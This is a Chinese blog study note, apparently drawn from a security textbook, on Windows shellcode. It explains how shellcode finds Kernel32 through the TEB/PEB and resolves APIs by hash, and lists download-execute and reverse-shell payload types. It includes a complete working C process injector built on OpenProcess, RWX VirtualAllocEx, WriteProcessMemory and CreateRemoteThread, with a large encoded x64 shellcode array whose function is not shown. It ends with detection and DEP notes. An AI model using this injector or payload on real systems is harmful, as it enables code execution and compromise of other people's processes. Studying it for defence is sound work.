[笔记]Windows安全之《三》Shellcode

已于 2022-06-08 11:03:44 修改
阅读量666 收藏 3
点赞数
分类专栏: windows 安全 文章标签: 安全 web安全
于 2022-05-26 19:05:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1113673178/article/details/124989602
版权
windows 同时被 2 个专栏收录
34 篇文章 30 订阅
订阅专栏
安全
10 篇文章 1 订阅
订阅专栏

《加密与解密 漏洞篇 14.2 Shellcode》

文章目录

前言

Shellcode实际上是一段可以独立执行的代码(也可以认为是一段填充数据),在触发了缓冲区溢出漏洞并获取了eip指针的控制权后,通常会将eip指针指向Shellcode以完成漏洞利用过程。

eip指针是指令指针的一种,指令指针IP/EIP/RIP的基本作用是指向要执行的下一条地址

Shellcode主要工作流程:
在这里插入图片描述

Shellcode的结构

Shellcode在漏洞样本中的存在形式一般为一段可以自主运行的汇编代码。
特点:

  • 它不依赖任何编译环境,也不能像在DE中直接编写代码那样调用API函数名称来实现功能。
  • 它通过主动查找DLL基址并动态获取API地址的方式来实现API调用,然后根据实际功能调用相应的API函数来完成其自身的功能。

Shellcode分为两个模块,分别是基本模块和功能模块,结构如图14.10所示。
在这里插入图片描述

基本模块

基本模块用于实现Shellcode初始运行、获取Kernel32基址及获取API地址的过程。

1.获取Kernel32基址

获取Kernel32基址的常见方法有:

  • 暴力搜索、
  • 异常处理链表搜索
  • TEB(Thread Environment Block)搜索。

这里只介绍目前最常用的动态获取Kernel32.dl基址的方法-TEB查找法。

其原理是:

在NT内核系统中,fs寄存器指向TEB结构,TEB+0x30偏移处指向PEB(Process Environment Block)结构,PEB+0x0c偏移处指向PEB_LDR_DATA结构,PEB_LDR_DATA+0x1c偏移处存放着程序加载的动态链接库地址,第1个指向Ntdll.dll,第2个就是Kernel.32.dll的基地址。

FS寄存器指向当前活动线程的TEB结构(线程结构)
偏移 说明
000 指向SEH链指针
004 线程堆栈顶部
008 线程堆栈底部
00C SubSystemTib
010 FiberData
014 ArbitraryUserPointer
018 FS段寄存器在内存中的镜像地址
020 进程PID
024 线程ID
02C 指向线程局部存储指针
030 PEB结构地址(进程结构)
034 上个错误号

如图14.11所示。
在这里插入图片描述
代码实现:
(使用了内联汇编,注意vs不支持x64的汇编)

//Windows XP SP3+VC6.0,编译选项:Debug(默认配置)
#include <stdio.h>
#include <stdio.h>
#include <Windows.h>
int main(int argc, char*argv[])
{
	DWORD hKernel32 = 0;

	_asm{
		mov eax,fs:[30h]
		mov eax,dword ptr[eax + 0ch]
		mov esi,dword ptr[eax + 1ch]
		lodsd 
		mov eax,dword ptr[eax + 8]
		mov hKernel32, eax
		; 获取Kernel32基址
	}
	printf("hKernel32 0x%x\n", hKernel32);
	system("pause");
	return 0;
}

3.获得API地址

从DLL文件中获取API地址的方法如图14.12所示,步骤如下:

  1. 在DLL基址+3ch偏移处获取e lfanew的地址,即可得到PE文件头。
  2. 在PE文件头的78h偏移处得到函数导出表的地址。
  3. 在导出表的1ch偏移处获取AddressOfFunctions的地址,在导出表的20h偏移处获取AddressOfNames的地址,在导出表的24h偏移处获取AddressOfNameOrdinalse的地址。
  4. AddressOfFunctions函数地址数组和AddressOfNames函数名数组通过函数AddressOfName Ordinalse一一对应。
    在这里插入图片描述

在实际应用中,如果API函数名称直接以明文出现,就会降低Shellcode的分析难度。
而且, API函数名称占用的空间一般都比较大,这会使Shellcode的体积跟着增大。要知道,在内存中用于存放Shellcode的空间可谓寸土寸金,所以,黑客们想了一个好办法,利用Hash算法将要获取的函数名称转换为一个4字节的Hash值,在搜索过程中按此算法计算DLL中的文件名称的Hash值,对比两个Hash值是否相同。这样就有效减小了Shellcode的体积,同时提高了Shellcode的隐蔽性。

获取API地址示例代码:
(参考 加密与解密代码 可私信我获得)

FindApi:
		push    ecx
		push    ebp
		mov     esi, dword ptr[ebx + 3Ch]	// e_lfanew
		mov     esi, dword ptr[esi + ebx + 78h]// EATAddr
		add     esi, ebx
		push    esi
		mov     esi, dword ptr[esi + 20h]    //AddressOfNames
		add     esi, ebx
		xor     ecx, ecx
		dec     ecx

Find_Loop :
		inc     ecx
		lods    dword ptr[esi]
		add     eax, ebx
		xor     ebp, ebp
//计算hash值	
Hash_Loop :
	movsx   edx, byte ptr[eax]
		cmp     dl, dh
		je      hash_OK
		ror     ebp, 7
		add     ebp, edx
		inc     eax
		jmp     Hash_Loop

hash_OK :
		//判断hash值是否相等
		cmp     ebp, dword ptr[edi]
		jnz     Find_Loop

		pop     esi
		mov     ebp, dword ptr[esi + 24h]	//Ordinal Table
		add     ebp, ebx
		mov     cx, word ptr[ebp + ecx * 2]
		mov     ebp, dword ptr[esi + 1Ch]	//Address Table
		add     ebp, ebx
		mov     eax, dword ptr[ebp + ecx * 4]
		add     eax, ebx

另外,因为Shellcode需要实现的功能不同,所以调用的可能不仅仅是Kernel32中的API。
如何解决这个问题呢?
在得到Kernel32的基址之后,通过上面的方法获取Kernel32里的两个重要API的地址
(即LoadLibrary和GetProcessAddress) 。通过它们的组合就可以获取任意DLL中的API地址了。

功能模块

功能模块就是实现漏洞利用目的的那部分Shellcode.。前面介绍的基础模块所做的工作,其目的就是在这里实现相应的功能。下面介绍Shellcode的几种常见功能:

1.下载执行(Download & Execute)

具有这个功能的Shellcode最常被浏览器类漏洞样本使用,其功能就是从指定的URL下载一个exe文件并运行,工作流程如图14.13所示。
在这里插入图片描述

2.捆绑 (Binder)

具有这个功能的Shellcode最常见于Office等漏洞样本中,其功能是将捆绑在样本自身上的exe数据释放到指定目录中并运行,工作流程如图14.14所示。
在这里插入图片描述

3.反弹shell

具有这个功能的Shellcode多见于主动型远程溢出漏洞样本中,攻击者可以借助NC等工具,在实施攻击后获取一个远程She以执行任意命令,工作流程如图14.15所示。
在这里插入图片描述

Shellcode通用技术

Shellcode编写

Shellcode利用提取和调试

Shellcode注入

将ShellCode注入进程内存

shellcode注入是一种进程注入技术,其主要过程如下:

  • 利用OpenProcess()附加到被害进程

  • 使用VirtualAllocEx()在被害进程中分配内存,这里一定要以可执行权限分配,不然会由于DEP保护,使得注入的代码无法执行

  • 使用WriteProcessMemory()函数在分配的内存中写入shellcode

  • 使用CreateRemoteThread()将程序执行流控制到shellcode的起始地址(执行shellcode)

#include <stdio.h>
#include <windows.h>

unsigned char ShellCode[] =
"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xce\x25\x3d\xaf\x16\x16\x69\x6f\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x32\x6d\xbe\x4b\xe6\xfe"
"\xa5\x6f\xce\x25\x7c\xfe\x57\x46\x3b\x3e\x98\x6d\x0c\x7d\x73"
"\x5e\xe2\x3d\xae\x6d\xb6\xfd\x0e\x5e\xe2\x3d\xee\x6d\xb6\xdd"
"\x46\x5e\x66\xd8\x84\x6f\x70\x9e\xdf\x5e\x58\xaf\x62\x19\x5c"
"\xd3\x14\x3a\x49\x2e\x0f\xec\x30\xee\x17\xd7\x8b\x82\x9c\x64"
"\x6c\xe7\x9d\x44\x49\xe4\x8c\x19\x75\xae\xc6\x70\xe8\x17\xd6"
"\x2e\x3f\xa0\x93\x64\x69\x6f\xce\xae\xbd\x27\x16\x16\x69\x27"
"\x4b\xe5\x49\xc8\x5e\x17\xb9\x3f\x45\x6d\x25\xeb\x9d\x56\x49"
"\x26\xcf\xf5\xde\xf9\x5e\xe9\xa0\x2e\x45\x11\xb5\xe7\x17\xc0"
"\x24\x5e\x07\x6d\x0c\x6f\xba\x57\xa8\xa6\xc3\x64\x3c\x6e\x2e"
"\xf6\x1c\x9e\x82\x26\x71\x8b\x1e\x53\x50\xbe\xbb\xfd\x65\xeb"
"\x9d\x56\x4d\x26\xcf\xf5\x5b\xee\x9d\x1a\x21\x2b\x45\x65\x21"
"\xe6\x17\xc6\x28\xe4\xca\xad\x75\xae\xc6\x57\x31\x2e\x96\x7b"
"\x64\xf5\x57\x4e\x28\x36\x8f\x7f\x75\x2c\xfa\x36\x28\x3d\x31"
"\xc5\x65\xee\x4f\x4c\x21\xe4\xdc\xcc\x76\x50\xe9\xe9\x34\x26"
"\x70\x52\x4e\x9d\x49\x25\x5b\x6f\xce\x64\x6b\xe6\x9f\xf0\x21"
"\xee\x22\x85\x3c\xaf\x16\x5f\xe0\x8a\x87\x99\x3f\xaf\x31\x19"
"\xa9\xc7\xcf\x3b\x7c\xfb\x5f\x9f\x8d\x23\x47\xd4\x7c\x15\x5a"
"\x61\x4f\x68\x31\xf0\x71\x26\xfc\x7e\x68\x6e\xce\x25\x64\xee"
"\xac\x3f\xe9\x04\xce\xda\xe8\xc5\x1c\x57\x37\x3f\x9e\x68\x0c"
"\x66\x5b\x27\xa9\x27\x31\xe5\x75\x26\xd4\x5e\x96\xaf\x86\xac"
"\xfc\xee\xac\xfc\x66\xb0\x2e\xda\xe8\xe7\x9f\xd1\x03\x7f\x8f"
"\x7d\x71\x26\xf4\x5e\xe0\x96\x8f\x9f\xa4\x0a\x62\x77\x96\xba"
"\x4b\xe5\x49\xa5\x5f\xe9\xa7\x1a\x2b\xcd\xae\xaf\x16\x16\x21"
"\xec\x22\x35\x75\x26\xf4\x5b\x58\xa6\xa4\x21\x7c\xf7\x5e\x9f"
"\x90\x2e\x74\x27\xe4\x67\x49\xe9\xbc\xec\x36\x25\x43\xfa\x5e"
"\x95\xad\x4f\x90\xac\xcb\xc5\x56\x57\x30\x07\xce\x35\x3d\xaf"
"\x57\x4e\x21\xe6\x3c\x6d\x0c\x66\x57\xac\x31\xcb\x9d\xc0\xc2"
"\x7a\x5e\x9f\xaa\x26\x47\xe2\x70\x9e\xdf\x5f\xe0\x9f\x86\xac"
"\xe7\xe7\x9f\xef\x28\xd5\xcc\xfc\xf5\xf0\xe9\xc3\xea\x97\xce"
"\x58\x15\xf7\x57\x41\x30\x07\xce\x65\x3d\xaf\x57\x4e\x03\x6f"
"\x94\x64\x87\xa4\x39\x19\x59\x90\x1b\x72\x64\xee\xac\x63\x07"
"\x22\xaf\xda\xe8\xe6\xe9\xd8\x80\x53\x31\xda\xc2\xe7\x17\xd5"
"\x21\x46\x08\x6d\xb8\x59\x63\xa2\x28\x90\x29\x7d\x57\xaf\x4f"
"\x5f\xae\xad\x3e\x90\x9f\xf9\xe9\xc3\x69\x6f";

int main()
{
	HANDLE Handle;
	HANDLE remoteThread;
	PVOID remoteBuffer;
	DWORD Pid;
	printf("输入待注入进程PID号:");
	scanf("%d", &Pid);
	Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE,Pid);
	remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);
	remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(Handle);
	return 0;
}

反Shellcode注入和反反Shellcode注入

反Shellcode注入

[原创]从内存取证角度检测shellcode

shellcode成功注入并执行后,受害进程中会存在具有可执行权限保护的页面,那么页面对应的pte的NX位应置为0。而正常进程中几乎不可能利用分配的内存去执行恶意代码,也就是说一般情况下分配的内存不会出现可执行权限,利用这一特点,能够检测进程地址空间是否有shellcode。

检测思路如下:

  • 首先将进程的用户地址空间区分为映射文件区和非映射文件区,映射文件区主要包括进程的加载可执行文件和模块,如exe文件、dll文件、nls文件等;非映射文件区主要包括内存中的堆栈等缓冲区,这些内存区几乎不会分配可执行权限的页面。这样做的目的是由于内存中的映射文件本身具有可执行的页面,需要将这些排除在外,防止产生误报。

  • 获取全部非映射文件区的页面的pte

  • 检查这些pte的NX位,若存在NX为0的页面,说明这个页面可能是被注入的页面

  • 输出被注入的页面地址及其内容

反Shellcode之什么是DEP保护

DEP将非代码段的页表属性设置成“不可执行”,一旦系统从这些地址空间进行取指令操作, CPU就会报告“内存违规”异常,进而“杀死”进程。栈空间也被操作系统设置了“不可执行”属性,因此,注入栈中的Shellcode就无法执行了。

开启DEP保护

控制面板->系统和安全->系统->高级系统设置->高级->性能->数据执行保护
在这里插入图片描述

反反Shellcode注入-绕过DEP保护的方法

ROP技术

总结

二进制怪兽
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
windows 最小shellcode
01-28
363字节正向连接后门(含源码) 363字节正向连接后门(含源码)
Windows 10_X64环境shellcode编写
Anansi的博客
11-20 2125
环境 windows 10_x64 windbg_x64 x64dbg nasm 适用于 VS 2017 的 x64 本机工具命令提示(安装visual studio会自带) redasm shellcode shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言/汇编编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 虽然现在的操
Windows shellcode编写和提取细节
蚁景网安学院
03-01 570
0x00 shellcode编写首先shellcode的编写可以用纯汇编也可以用c++,其两者难易程度可想而知,还是抱住VS的大腿,不过这其中要注意一些代码格式和编译选项,以确保生成的s...
探秘S-Inject:Windows下的DLL+Shellcode免杀注入神器
最新发布
gitblog_00095的博客
06-04 501
探秘S-Inject:Windows下的DLL+Shellcode免杀注入神器 S-inject支持x86/x64的DLL和ShellcodeWindows注入的免杀工具,支持图形化界面项目地址:https://gitcode.com/gh_mirrors/si/S-inject 在网络安全研究与逆向工程的领域里,有时我们需要进行进程注入以实现某些特定的功能,比如动态调试、性能监测或是安全检...
【网络资源学习笔记ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2613
个人shellcode相关网络资源学习记录
shellcodeWindows shellcode的理解与编写
dr0op's blog
03-31 1079
虚拟内存空间 整个虚拟内存空间分为两个相关部分: 为用户进程预留的虚拟内存空间和为系统进程预留的虚拟内存空间。 每个进程都有自己的私有虚拟地址空间,其中“内核空间”是一种“共享环境”,意味着每个内核进程可以在任何它想要的地方读写虚拟内存。 其中: HEAP(堆) : 这是存储所有动态局部变量的地方。(通常alloc()或类似的系统调用) STACK(栈): 分配每个静态局部变量的位置。 RWX-Hunter执行: 搜索已被标记为读(R),写(W)和执行(X)的内存部分。 遍历进程的虚拟空间内存,搜索标记
window系统下的远程堆栈溢出----shellcode编写
03-02 1220
堆栈溢出系列讲座window系统下的远程堆栈溢出----shellcode编写应用前面的设计思想,我们可以写出来shellcode如下:unsigned char sploit[580] = {0x90, 0x8b, 0xfc, /* mov edi,esp */ 0x33, 0xc0, /* xor eax, eax */0x50, /* push eax */0xf7, 0xd0, /* no
Study_shellcode:windows平台下功能shellcode的编写
04-29
windows平台下功能shellcode的编写 包含了5个类型的test例子,不知道从哪里下载的。 例子可能比较老,在win7,win10上可能无法成功执行,新系统的安全性比较高,最佳的环境是在...Windows平台shellcode开发入门(
rust-windows-shellcode:Rust中的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法...
windows平台下功能shellcode的编写
11-12
在IT安全领域,Shellcode是一种特殊的恶意代码,它在计算机内存中执行,通常由病毒、木马或exploit(利用程序)注入。本主题聚焦于Windows平台下的功能Shellcode编写,这是一种高级技术,涉及到深入理解操作系统...
广州大学软件安全期末复习笔记
03-24
### 广州大学软件安全期末复习笔记知识点梳理 #### 一、漏洞生命周期与特性 - **漏洞周期**:包括从漏洞被发现到被修复的整个过程。 - **缺陷**:指的是产品本身的不足之处,可能导致功能失效。 - **漏洞**:在...
使用windows系统调用编写shellcode
01-10 1800
原创翻译]使用windows系统调用编写shellcode原文作者:Piotr Bania 原文出处:http://securityfocus.com/infocus/1844/1翻译作者:无敌最寂寞本文来源:邪恶八进制信息安全团队使用windows系统调用编写shellcode简介写此文的用意,是想让大家知道在windows系统下我们完全可以写出不依赖于标准API调用的shellcode。当然,
透析黑客攻击技术之渗透防火墙的Shellcode(转)
cuanjun1153的博客
09-19 318
透析黑客攻击技术之渗透防火墙的Shellcode(转)[@more@]  内容摘要  1. 远程shellcode的几种实现方式  2. 复用当前连接技术的一些问题及优势  3. Win32平台的具体实现  4. Linux x...
网络攻防技术—shellcode编写实验
wion03的博客
10-18 1488
shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode,但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的技术。本实验的目的是帮助学生理解这些技术,以便他们能够编写自己的shellcode。编写shellcode有几个挑战,一个是确保二进制文件中没有0x00,另一个是找出命令中使用的数据的地址。第一个挑战不是很难解决,有几种方法可以解决它。
windows shellcode 总结
weixin_34267123的博客
12-03 241
说到shellcode可能都有些迷茫,不知它是什么东西,可能觉得也很神秘,对于它的专业解释也很少有人提及,今天我们就从以下几个方面来对windows下的shellcode做一个全剖析: 1. shellcode的发展历史以及定义 2. 现今常见的windows下的shellcode种类 3. 编写shellcode流程 4. shellocode举例 5、shell...
Windows Shellcode开发[3]
weixin_41487541的博客
03-25 5394
0 前言及编写shellcode准备工作 在Windows Shellcode开发介绍的最后一部分,我们将编写一个简单的改变鼠标左右键的shellcode。我们需要用到两个函数:SwapMouseButton和ExitProcess函数。首先看一个两个函数的参数与返回值情况: SwapMouseButton只有一个BOOL类型参数,若参为TRUE则交换鼠标左右键,返回值非0; ExitProcess也只有一个参数,代表进程退出代码。 整理一下思路: 我们需要调用以上两个函数,在C++中体现
windowsshell_一步步学写Windows下的Shellcode
weixin_39602560的博客
10-21 663
如何在WIndows下编写一个shellcode?为什么会问这个问题,前段时间在做win下的Exploit,但是都是使用大佬写的shellcode,无法实现个人的一些需求。而网络上编写shellcode的教程大多是关于Linux的,加之顺带学习PE文件结构,所以打算写一篇关于Windowsshellcode的编写,为要编写Shellcdoe的读者提供一些参考。摘要:在C语言中,调用一...
打造Windows下自己的ShellCode
P-Blog
08-30 3027
打造Windows下自己的ShellCode 文/图 王炜/ww0830    为了帮助初学者了解ShellCode的编写,并能一步一步操作得到自己的ShellCode,因此将WindowsShellCode的编写过程作详细的介绍,以利于像我一样的菜鸟,最终能够写出简单的但却是真实的ShellCode;而进一步高级的ShellCode的编写,也会在系列后面的文章中一步一步的演示的,希望大家会
Windows下反弹shell的方式
ws1813004226的博客
05-25 6174
一、Windows下反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell是反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
Windows Shellcode:句法、过滤器与安全漏洞利用
"该文主要讨论了Shellcode的编写,特别是Windows Shellcode的挑战和技巧,包括句法、过滤器的处理以及X86 AT&T和Intel句法的区别。此外,还提到了安全漏洞和多平台Shellcode的相关知识。" 在计算机安全领域,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

二进制怪兽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值